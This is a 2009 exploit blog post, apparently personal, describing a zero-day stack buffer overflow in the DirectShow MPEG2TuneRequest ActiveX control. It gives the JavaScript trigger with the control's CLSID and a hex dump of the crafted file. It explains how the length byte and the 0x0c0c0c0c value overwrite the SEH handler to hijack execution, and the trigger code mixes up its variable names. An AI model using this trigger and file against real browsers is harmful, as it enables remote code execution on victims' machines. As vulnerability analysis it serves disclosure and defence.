Recent Posts
- Scary monsters (and super creeps)
- Happy exploit wednesday!
- All you can spray
- Update: PDF sploits in the wild
- PDF sploits in the wild
- MPEG2TuneRequest 0-day
- Bad guys and sexy sploits: CVE-2009-1537
- Use the source, Luke!
- Vuln: Microsoft Excel Object Type Confusion Remote ..
-
Microsoft Excel Object Type Confusion Remote Code Execut..
- Vuln: Microsoft Excel MDXSET Record Remote Heap Buf..
-
Microsoft Excel MDXSET Record Remote Heap Buffer Overflo..
- Vuln: RETIRED: Microsoft March 2010 Advance Notific..
-
RETIRED: Microsoft March 2010 Advance Notification Multi..
Categories
Comments
- abhi:Hi, I go
- k`sOSe:sorry for that,
- ftk:can you reuploa
- Vincent:Yup, 403.
- DG:403 Forbidden f
- k`sOSe:yep, exactly. t
- Thierry :"assuming
- h4x0r:Yeahhh ! i,m w
- snip:All work and no
- testonly:hi, i tried thi
- k`sOSe:hello w0lf, tha
- w0lf:hello frist of
- k`sOSe:Hi send9, feel
- k`sOSe:heya snip, than
- send9:Nice. I don
- snip:Guido, questa m
- fXsTar:Infernet eXplod
- k`sOSe:yeah indeed, my
- nopper:w00ting club :)
- k`sOSe:well said patri
- k`sOSe:thx
- sweet :cool shit you g
- k`sOSe:Fossi in te ci
- devon:Appena fixano r
PornoSecurity: sexy vulns, porno sploits and the like
MPEG2TuneRequest 0-day
Posted on 2009-07-07 16:57:01 in PornoSecurity
Again, another DirectShow vulnerability.This time it is a stack based buffer overflow triggered by passing an url of a crafted file to the "data" property of an MPEG2TuneRequest object. This is how a malicious script looks like:
my obj = document.createElement('object');
myObject.data='logo.gif';
obj.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
This is the hex dump of the malicious file:
00030000 11203400 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 0000FFFF FFFF0C0C 0C0C00The seventh byte of the file(0x34) is used as an argument for the ReadFile function:
As you can see 0x34 bytes are being copied to the stack and a SE Handler is being overwritten. The SEH will be overwritten with the 4 bytes at offset 63 within the file(0x0c0c0c0c) thus hijacking the execution flow at the first exception.